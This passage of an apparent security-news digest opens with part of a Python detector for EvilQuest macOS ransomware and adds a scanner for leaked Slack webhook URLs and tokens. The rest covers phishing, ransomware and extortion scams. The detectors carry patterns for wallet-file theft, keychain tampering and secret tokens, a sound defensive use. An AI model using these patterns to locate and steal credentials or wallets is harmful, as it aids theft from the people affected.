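    for line in log_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        proc, path, action = line.split("\t", 2)
        events.append({"proc": proc, "path": path, "action": action})
    return events


def is_wallet_target(path):
    """True if the file name matches one of the wallet names EvilQuest hunts for."""
    name = posixpath.basename(path)
    return any(fnmatch.fnmatch(name, pat) for pat in WALLET_PATTERNS)


def hunt(events, burst_threshold=20):
    """Return {finding_name: [evidence, ...]} for the indicators seen in events."""
    findings = defaultdict(list)
    writes_per_proc = defaultdict(int)
    for ev in events:
        proc, path, action = ev["proc"], ev["path"], ev["action"]
        if path == DROPPER_PATH and action in ("create", "exec"):
            findings["dropper_in_users_shared"].append(f"{proc}:{action}")
        if posixpath.basename(path) in RANSOM_NOTE_NAMES and action == "create":
            findings["ransom_note"].append(path)
        if action == "read" and is_wallet_target(path):
            findings["wallet_file_access"].append(path)
        if action == "write" and KEYCHAIN_DIR in path:
            findings["keychain_modified"].append(path)
        if action == "write":
            writes_per_proc[proc] += 1
    # One process rewriting many user files in a burst is the encryption
    # phase; the threshold is a tunable assumption, not a fixed indicator.
    for proc, count in writes_per_proc.items():
        if count >= burst_threshold:
            findings["mass_write_burst"].append(f"{proc}:{count}")
    return dict(findings)


def scan_sample():
    """Run the hunt over the constructed sample with a low burst threshold."""
    return hunt(parse_events(SAMPLE_LOG), burst_threshold=5)


if __name__ == "__main__":
    for name, evidence in scan_sample().items():
        print(f"{name}: {evidence}")
```

The ransom-note and dropper checks are exact-match indicators and will be the first thing a new variant changes; the keychain write and the write burst are behavioural and survive renaming, which is why both kinds are kept side by side.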

EvilQuest joins a small list of ransomware families in the wild specifically targeting Mac users, including KeRanger and MacRansom. However, “there are still a number of open questions that will be answered through further analysis,” Reed said. “For example, what kind of encryption does this malware use? Is it secure, or will it be easy to crack (as in the case of decrypting files encrypted by the FindZip ransomware)? Will it be reversible, or is the encryption key never communicated back to the criminals behind it (also like FindZip)?”




COVID-19 Related Phishing Scams Target Passport Details


Coronavirus-themed phishing scams have only become more aggressive and more targeted, InfoSecurity Magazine reports. Researchers at Griffin Law are now tracking a COVID-19-related phishing campaign aimed at self-employed people.

According to Griffin Law, the scam begins with a text message purporting to be from HMRC informing the recipient they are due a tax refund which can be applied for online via an official looking site that uses HMRC branding and is entitled “Coronavirus (COVID-19) guidance and support.”

The bogus site then asks for several pieces of sensitive information before also requesting the user’s passport number as ‘verification’, a new twist on a scam Griffin Law had previously documented.

Chris Ross, SVP, Barracuda Networks, warned that cyber-criminals will continue to exploit any situation to harvest financial data from individuals and see the national emergency as the perfect opportunity to fool vulnerable victims into handing over personal information.

“Security awareness is key within the workforce, and it’s vital that all employees are trained about how these schemes operate as well as how SMS can be exploited as part of a wider phishing scheme.”

New-school security awareness training can teach your users how to spot the warning signs for these types of phishing tactics.



Enterprises Experience Nearly Five Times as Many Mobile Phishing Attacks as Last Year


With every organization looking at protecting their corporate devices, the bad guys are increasingly setting their focus on one of the softest targets: the mobile device.

The use of a mobile device for both work and personal use is ubiquitous in today’s society. The ability to switch from responding to a business email to finding flowers for your significant other on the same device has made the mobile device a necessity in most people’s lives. This constant use of a trusted device is the perfect way for cybercriminals to find ways to scam both individuals and businesses.

According to mobile security vendor Lookout’s The State of Mobile Phishing report, mobile attacks continue to be on the rise.

The percentage of businesses that have encountered a mobile phishing attack year-over-year in the 1st quarter has jumped 475% over 2019! North American businesses have seen the greatest amount of mobile phishing with nearly one-quarter (24.71%) of organizations experiencing mobile phishing attacks. Top industries targeted include healthcare, professional services, financial services, and manufacturing.

In the wake of COVID, we’ve learned that 36% of employees access work applications from personal devices – which includes mobile devices. This means with the massive growth in mobile phishing attacks, organizations are materially more at risk than a year ago.

To address this risk, organizations need to empower users to embrace a security mindset using Security Awareness Training. By educating users on how phishing attacks work, the devices and methods used, and the impact of a successful attack, users can act as part of the organization’s security strategy and thwart attacks before they gain a foothold.




Slack Phishing


People need to be able to use their instincts in order to spot new phishing techniques, according to Ashley Graves, a Cloud Security Researcher at AT&T Alien Labs. On the CyberWire’s Research Saturday podcast, Graves described a phishing technique that abuses webhooks in Slack to fool users into granting an attacker access to their Slack data.

A webhook is a feature that allows third-party apps to send messages to a specific Slack channel via a unique URL. Anyone can send a message to the Slack channel if they know this URL, so it’s important that the URL be kept secret. If an attacker discovers a leaked webhook URL, they can craft a phishing message and send it directly into a Slack workspace to trick a user into installing a malicious app. This app can then exfiltrate data from the targeted workspace.
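Because a webhook URL is the credential, the practical defence is to find leaked copies before an attacker does. The following is an added example, not code from the original post or from AT&T Alien Labs: it scans text (a committed .env file, a CI log) for Slack incoming-webhook URLs and Slack API tokens and reports them with the secret portion redacted. The sample text is constructed and uses Slack’s own documentation placeholder (T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX) rather than a real hook; the token prefix pattern (xoxb-, xoxp-, xoxa-, xoxr-) is assumed from Slack’s published token formats.

```python
"""Scan text for leaked Slack incoming-webhook URLs and API tokens.

Added example, not code from the original post or from AT&T Alien Labs. The
sample text below is constructed (the webhook uses Slack's documentation
placeholder T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX). Every hit is a
live credential: whoever holds a webhook URL can post into its channel until
the webhook is revoked in the Slack app settings.
"""
import re

# Incoming webhook URL: workspace (team) id, hook id, then the secret token.
WEBHOOK_RE = re.compile(
    r"https://hooks\.slack\.com/services/(T[A-Z0-9]+)/(B[A-Z0-9]+)/([A-Za-z0-9]+)"
)
# Slack API tokens (bot, user, app, refresh) share an xox?- prefix (assumed format).
TOKEN_RE = re.compile(r"\bxox[abpr]-[A-Za-z0-9-]{10,}")

SAMPLE = "\n".join([
    "# constructed sample: a committed .env file plus one CI log line",
    "SLACK_WEBHOOK=https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX",
    "SLACK_BOT_TOKEN=xoxb-000000000000-000000000000-AbCdEfGhIjKlMnOpQrStUvWx",
    "2020-06-30T12:00:01Z INFO notifier: POST https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX 200",
])


def redact(secret, keep=4):
    """Show only the first `keep` characters so the report does not re-leak the secret."""
    return secret[:keep] + "..." + f"({len(secret)} chars)"


def find_webhooks(text):
    """One entry per distinct webhook: (team_id, hook_id, redacted_token, line_numbers)."""
    seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in WEBHOOK_RE.finditer(line):
            team, hook, token = m.groups()
            seen.setdefault((team, hook, token), []).append(lineno)
    return [(t, h, redact(tok), lines) for (t, h, tok), lines in seen.items()]


def find_tokens(text):
    """One entry per distinct Slack API token: (redacted_token, line_numbers)."""
    seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in TOKEN_RE.finditer(line):
            seen.setdefault(m.group(0), []).append(lineno)
    return [(redact(tok), lines) for tok, lines in seen.items()]


def scan(text):
    """Combine both scans; any non-empty list means rotate that credential."""
    return {"webhooks": find_webhooks(text), "tokens": find_tokens(text)}


if __name__ == "__main__":
    import json
    print(json.dumps(scan(SAMPLE), indent=2))
```

The team and hook ids are kept in the report because they identify which workspace and which webhook to revoke; the token is what grants posting access, so it is never echoed in full.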

Graves emphasized that this attack doesn’t have any visible warning signs, since the communication comes directly from Slack through a legitimate service.

“The only indication that exists would be the person's gut feeling that it doesn't seem right, that this app should not be requesting this level of data,” she said.

Graves said part of the solution is improved awareness around what attackers can do with certain information.

“So, I think some people legitimately don't understand how much access an attacker can gain when credentials are leaked, and even more so when a webhook secret is leaked,” Graves explained. “On the other side of it is understanding what you're giving third parties access to. So, knowing to read those OAuth scopes, understanding how the application that you're using might use that access. Like, it wouldn't make sense – to me, at least – for a webhook to need access to my documents. So, that's something that they have to look over and have some sort of understanding around whether it's some self-learning, whether it's included in security awareness training or something like that.”

Graves noted that anyone can be fooled by social engineering, so companies need to ensure that users know when they should be cautious and ask for assistance before taking an action.

“But again, we've seen in similar attacks in the past that users can be easily tricked and that it's not stupidity,” she said. “It's not even ignorance. It's just that this is very new technology to a lot of people, and the prompts are not always clear, and there is a lot of small text about how they work. So I think that companies need to, I suppose, make as much effort as possible to help people understand the impact of their actions.”

Attackers will never stop coming up with new ways to dupe people into granting them access. New-school security awareness training can give your employees a healthy sense of suspicion to enable them to stop social engineering attacks.



Don't Fall Victim To These Common Social Networking Scams


When we consider phishing scams, we tend to think about email, but many cybercriminals target popular social media channels to hook their prey. The central goal is still to persuade someone to click a link, reveal logins and passwords or share other sensitive details. Victims may unwittingly trigger the download of malware, installing keyloggers that record keystrokes and Trojans that send them to cybercriminals. Sometimes victims will enter login details onto fake websites or answer queries that are presented as legitimate requests or fun activities, like quizzes.

Social networking is all about interacting with people, and familiarity with social media platforms can cause us to let our guard down. It's easy to emulate official services like Twitter or Facebook, and hacked accounts can be leveraged to cause all sorts of mischief.

In this article, we're going to delve into some common scams on four of the most popular social media platforms.

Typical Facebook Phishing Scams

As the largest social media platform on earth, Facebook has become an all too popular hunting ground for cybercriminals. Despite Facebook's efforts to combat spam and scams, it remains a hotbed for phishing attacks. There are many kinds of phishing scenarios at play on Facebook.

Cybercriminals will often send emails that purport to come from Facebook and closely imitate the look of genuine emails. These phishing emails will typically include an alarming message stating that your password has been reset and you must click on a link or open an attachment to sort things out or risk losing access to your account.

Invariably, the link or attachment triggers malware. But this kind of thing is a typical email phishing ploy that's counting on your familiarity and trust with Facebook.

Some of the sneakier phishing attacks will use the platform itself. You may be befriended by fake accounts that cybercriminals have set up specifically to harvest personal details.

Hacked accounts are frequently used to post malicious links that may direct people to fake login pages. If the victim enters their email address and password, then the scammer has access to their account and personal details, using it to scam all their contacts in a similar manner.

You're much more likely to click a link when it appears to have been posted by a trusted friend or family member. Some scammers use hacked accounts to appeal to family and friends for money transfers. If the cybercriminal is smart, they will wait until someone is traveling, then send an instant message through Facebook posing as the person, explaining that they've run into trouble, and appealing to family or friends for help. Usually, a link will be offered to make the cash transfer.

Even those apparently innocuous quizzes that people do for a bit of fun, such as "What Star Wars character are you?" may be data grabs from unscrupulous third-party developers. This can lead to the sale of your personal details and endless spam. If these shenanigans didn't work, they wouldn't exist.

Anatomy Of A Twitter Phish

Starting out with a phishing email to collect Twitter login details, cybercriminals can then use any accounts they've gained access to and send direct messages to those people's contacts to trick them into clicking links. Because Twitter has a character limit on tweets, it's also easy for cybercriminals to hide dodgy links behind URL-shortening services that mask the real address.

Another common scam on Twitter is to offer thousands of followers, sometimes even targeted demographics that businesses may covet. If you're persuaded to make a payment, you can end up at risk of identity theft. There's also a good chance, even if you do gain extra followers, that they'll be associated with fake accounts, which can lead to a Twitter ban.

Phishing On YouTube

Many scams on YouTube focus on the pursuit of more views, promising traffic increases or more subscribers if you hand over your YouTube account details and credit card number. This can lead to identity theft, your account being used to scam others or malware infection — sometimes all three.

Some scams exploit major events, such as natural disasters or terrorist attacks, to persuade you to click on a link to view a video that has supposedly been removed from YouTube for copyright reasons. This might trigger a pop-up window that insists you need to install a toolbar to watch the video or a survey that must be completed. In either case, you'll end up with malware on your system, or your personal details being used to hack your accounts or steal your identity.

Phishing Lures On LinkedIn

Even LinkedIn, the social networking of choice for businesspeople, isn't immune from phishing scams. Cybercriminals will frequently create false profiles, even posing as co-workers, to connect with you and gain access to your personal data. Sometimes the scammers will join group discussions and post malicious links that purport to be lucrative job offers or fake online application forms that can be used to harvest personal data.

These are just four popular platform examples of clicking gone wrong. If you ever posted on Craigslist, then you've probably been targeted with an offer to send you money, usually more than your asking price, and often without the person ever actually seeing the item for sale, in exchange for some personal details like your home address. If it sounds too good to be true, it always is.

In every case, you can protect yourself by maintaining a natural cynicism plus cautious distrust. Guard your personal information, be wary about who you connect with and, if in doubt, trust your instincts.

Our next in the series will look at even more tips for how to protect yourself from social media scams.



Phishing Attacks Significantly Increase in Singapore During COVID-19 Pandemic


The number of phishing attacks in Singapore aimed at getting people to give up personal information has almost tripled in the last year and doubled during the COVID-19 pandemic, according to the Cyber Security Agency of Singapore (CSA).

The CSA said that there were over 47,500 cases of phishing attacks last year, compared to 16,100 cases back in 2018.

This mirrors global trends as the number of phishing attacks around the world spiked in 2019, the highest since 2016.

The Minister-in-Charge of Cybersecurity, S. Iswaran, said phishing attacks continue to rise, with 1,500 dubious links sent from March to May, twice as many as in the preceding three months.

According to CSA's fourth annual report titled Singapore Cyber Landscape 2019, the Immigration and Checkpoints Authority, Ministry of Manpower and Singapore Police Force were government agencies that criminals most commonly pretended to be in those phishing e-mails and messages sent.

Unsuspecting users who click on the dubious links in the messages would be tricked into revealing personal information such as passwords or contact details. Mr Iswaran said that Singapore is a lucrative target for hackers. New-school security awareness training can ensure your users know how to spot the common red flags for a phishing email. 



Ransomware is now your biggest online security nightmare. And it's about to get worse


Ransomware is rapidly shaping up to be the defining online security issue of our era. It's a brutally simple idea, executed with increasing sophistication by criminal groups. A huge chunk of our lives is now stored digitally, whether that's photos, videos, business plans or customer databases. But too many of us, both businesses and consumers, have been lazy about securing these vital assets, creating an opportunity which criminals have exploited. 

Their brilliant twist was to realise they don't have to steal that data to make money: they just have to make it impossible for us to access it again -- by encrypting it -- unless we pay up.

Ransomware was once a menace mainly for consumers, but now it's a significant threat to business. Just last week, there were warnings about a new wave of ransomware attacks against at least 31 large organisations with the aim of demanding millions of dollars in ransom. The attackers had breached the networks of targeted organizations and were in the process of laying the groundwork for their attacks.

The vast majority of targets were household names, including eight Fortune 500 companies, tech security company Symantec said: if the attack (by a group calling itself Evil Corp) hadn't been disrupted, it could have led to millions in damages and downtime, with the impact felt through the supply chain.


Some of the hyperbole around ransomware is overblown. It's probably over the top to describe these WastedLocker attacks as part of Evil Corp's retaliation against the US government after its leaders were indicted by the Justice Department in December -- which is how The New York Times interpreted them. (Indeed, others have argued that the gang is actually trying to attract less attention right now, which is why, so far, it has not threatened to publish information stolen from its victims.)

But it's also true that these groups are smart, sophisticated and, because around half of companies pay the ransoms, very well funded.

For example, the group behind it has access to highly skilled exploit and software developers capable of bypassing network defences at all levels, according to researchers.

How skilled? When a version of their malware is spotted by the defences on victim networks, the group is often back with an undetectable version after just a short time.

In one case the group went so far as to pose as a potential customer to request a trial licence for a security product that was not commonly available, says FOX-IT, part of NCC Group.

The targets of the ransomware gangs have evolved, too. It's not just about PCs anymore; these gangs want to go after the really irreplaceable business assets too, which means file servers, database services, virtual machines and cloud environments. They'll also search out and encrypt any backups that organisations foolishly leave connected to the network. All of this makes it much harder for victims to recover -- unless of course they want to pay that ransom. And the attackers seem willing to take a longer view too; some of these attacks can take weeks or longer to go from the initial minor breach of network security through to complete control of the victim's corporate network.

Police forces, lacking officers trained in high-tech crime, are loath to investigate knowing that the perpetrators will be far from their jurisdiction and impossible to catch. Many businesses would rather pay up, return to business as usual and forget about the cost and the stress of the whole thing.

It's quite possible that ransomware will form the core of a new type of digital attack, used by nation states and others who simply want to destroy networks. Wiper malware dressed up as ransomware encrypts or overwrites data in a way that can't be reversed, so the data is lost forever. There have been a few of these incidents, but the fear is they could become more mainstream.

Another concern is that, as they become more confident and better funded, these criminal groups will raise their sights even higher. One new worrying trend is that gangs will steal the data as well as encrypting the network. They then threaten to leak the data as a means of pressuring the victim into paying up.

These cyber criminals often spend weeks poking around in a network before they make their attack, which means they have time to understand key digital assets, like the CEO's emails for example, allowing them to put even more pressure on their victims.

There's no obvious end to the ransomware nightmare in sight. Indeed, the likelihood is it will get even worse.



‘New VPN Configuration’ Email Tricks Microsoft 365 Users Out of Credentials


Scammers are taking advantage of the prominent use of VPNs by remote workforces to send out this very topically relevant phishing email that just wants to steal your credentials.

Nearly one-third of users utilize a VPN to access work-related sites and services. From a cybercriminal’s perspective, that’s a significant chunk of people to target. The shift to remote working due to COVID-19 has caused many organizations to treat the VPN as a standard part of work connectivity, making it part of their users’ everyday vernacular.

So, when scammers want to come up with a viable reason for needing the user to read their phishing email, it makes sense to use the VPN as the excuse. A new phishing campaign has been spotted in the wild touting the need for users to update their VPN configuration.

While this is a poorly worded and presented phishing scam, it represents a significant risk to organizations: users that are aware of their VPN but know little about it certainly don’t want to pass on a needed update, right?

This scam takes the victim to an impersonated Microsoft 365 login page to steal presented credentials.

There are a few ways to keep scams like this from succeeding:

  • Put Microsoft 365 multi-factor authentication in place – this will keep most scammers from being able to use the stolen credentials. But, even this security measure has been overcome.
  • Teach users not to fall for this – take a good look at the email itself. The from address doesn’t use the organization’s domain, it has terrible grammar, and it specifically requires the user to “login with your email and password” (which makes no sense for a VPN configuration update). Any user that has undergone Security Awareness Training would see right through this kind of scam, pressing the delete key the moment they realize it’s a bogus email.

There will always be the “next” scam that tries to convince your users that they need to log into Microsoft 365. Make sure they’re prepared.



Microsoft on COVID-19 Themed Cyberattacks


Microsoft’s Threat Protection Intelligence Team has published a report providing a detailed look into the proliferation of COVID-19-themed phishing over the past several months. The researchers found that the timing of these attacks was often correlated with local news stories, the better to capitalize on peoples’ fears when tensions were highest.

In the UK, for example, COVID-19-themed phishing attacks peaked when the US announced a travel ban to Europe. The country saw another spike in these attacks when Prime Minister Boris Johnson was moved to intensive care, but the attacks leveled off after Johnson was discharged from the hospital. South Korea saw a similar trend, with COVID-19 phishing peaking in May amid fears of a second wave of cases.

“Malware campaigns, attack infrastructure, and phishing attacks all showed signs of this opportunistic behavior,” the researchers write. “These shifts were typical of the global threat landscape, but what was peculiar in this case was how the global nature and universal impact of the crisis made the cybercriminal’s work easier. They preyed on our concern, confusion, and desire for resolution.”

Interestingly, the researchers present a graph showing that the global spike in COVID-19-themed phishing lures is “barely a blip” when viewed against the total number of phishing attempts during the same period. This indicates that cybercriminals continued operating as normal throughout the crisis, but modified some of their lures to exploit current events. The researchers explain that this strategy is consistent with how cybercriminals have always functioned.

“Cybercriminals are adaptable and always looking for the best and easiest ways to gain new victims,” the researchers write. “Commodity malware attacks, in particular, are looking for the biggest risk-versus-reward payouts. The industry sometimes focuses heavily on advanced attacks that exploit zero-day vulnerabilities, but every day the bigger risk for more people is being tricked into running unknown programs or Trojanized documents. Likewise, defenders adapt and drive up the cost of successful attacks. Starting in April, we observed defenders greatly increasing phishing awareness and training for their enterprises, raising the cost and complexity barrier for cybercriminals targeting their employees. These dynamics behave very much like economic models if you turn ‘sellers’ to ‘cybercriminals’ and ‘customers’ to ‘victims.’”

Microsoft concludes that organizations should invest in cross-domain signal analysis, patch management, and user education to ensure all their bases are covered. Attackers will always be shifting their tactics to overcome new security measures. New-school security awareness training can help your employees stay informed about the evolving threat landscape.



Phony Data Theft, Like Phony Sextortion


Extortionists are sending phony threats to website owners informing them that their sites’ databases will be leaked unless they pay a ransom of between $1,500 and $3,000, BleepingComputer reports. The scammers claim to have discovered a vulnerability in the target’s website that allowed them to steal the victim’s entire “database,” and they say they’ll either sell or publish the data to destroy the site’s reputation unless the victim pays up within five days.

“We will systematically go through a series of steps of totally damaging your reputation,” the email says. “First your database will be leaked or sold to the highest bidder which they will use with whatever their intentions are. Next if there are e-mails found they will be e-mailed that their information has been sold or leaked and your site [website URL] was at fault thusly damaging your reputation and having angry customers/associates with whatever angry customers/associates do. Lastly any links that you have indexed in the search engines will be de-indexed based off of blackhat techniques that we used in the past to de-index our targets.”

These emails are effective because the threats are plausible, or at least difficult to completely disprove. The website’s administrator might not be able to determine if the vague claim is true before the deadline hits, and the threats to manipulate the site’s SEO standing would grab the attention of any website owner. Additionally, many ransomware operators are now employing similar tactics by stealing data before encrypting it in place, and then using the stolen data as leverage in their ransom demands.

However, BleepingComputer points out that the emails don’t offer any evidence that the site was hacked. If the attackers had actually exfiltrated any data, they would, as a rule, prove it by sending a sample of the data or pointing to the vulnerability they exploited.

This scam is similar to a common sextortion technique in which a scammer claims to have embarrassing webcam footage of the recipient. The recipient has no way of knowing for sure whether the claims are true, so they might end up sending the money just in case.

People who receive these types of emails should assume the claims are bogus, and searching the Internet can provide further reassurance. In this case, BleepingComputer links to multiple examples of people posting on support forums asking if the emails are legitimate, showing that the scammers are indiscriminately sending out the same email template to many website and blog owners in the hope that some will fall for the scheme.

Caving to these types of extortionists is never a good idea. Even if your site’s data was actually stolen, paying a ransom is no guarantee that the attackers won’t sell the data anyway, and there’s nothing stopping them from coming back for more money. New-school security awareness training can teach your employees to remain calm and seek out trustworthy advice when they’re targeted with these tactics.



Two thirds of malware is invisible without HTTPS inspection


A new report from WatchGuard Technologies shows that 67 percent of all malware in the first quarter of this year was delivered via HTTPS, so organizations without security solutions capable of inspecting encrypted traffic will miss two-thirds of incoming threats.

In addition, 72 percent of encrypted malware was classified as zero day (meaning no antivirus signature exists for it, and it will evade signature-based protections). The findings suggest that HTTPS inspection and advanced behavior-based threat detection and response solutions are now requirements for every security-conscious organization.

"Some organizations are reluctant to set up HTTPS inspection due to the extra work involved, but our threat data clearly shows that a majority of malware is delivered through encrypted connections and that letting traffic go uninspected is simply no longer an option," says Corey Nachreiner, chief technology officer at WatchGuard. "As malware continues to become more advanced and evasive, the only reliable approach to defense is implementing a set of layered security services, including advanced threat detection methods and HTTPS inspection."

Other findings of the report include a jump in cryptomining activity. Five of the top 10 domains distributing malware in Q1 (identified by WatchGuard's DNS filtering service DNSWatch) either hosted or controlled Monero cryptominers.

A three-year-old Adobe Acrobat Reader exploit, patched back in August 2017, appeared in WatchGuard's top network attacks list for the first time in Q1 too. Overall, though, there were 6.9 percent fewer malware hits and 11.6 percent fewer network attacks in Q1.

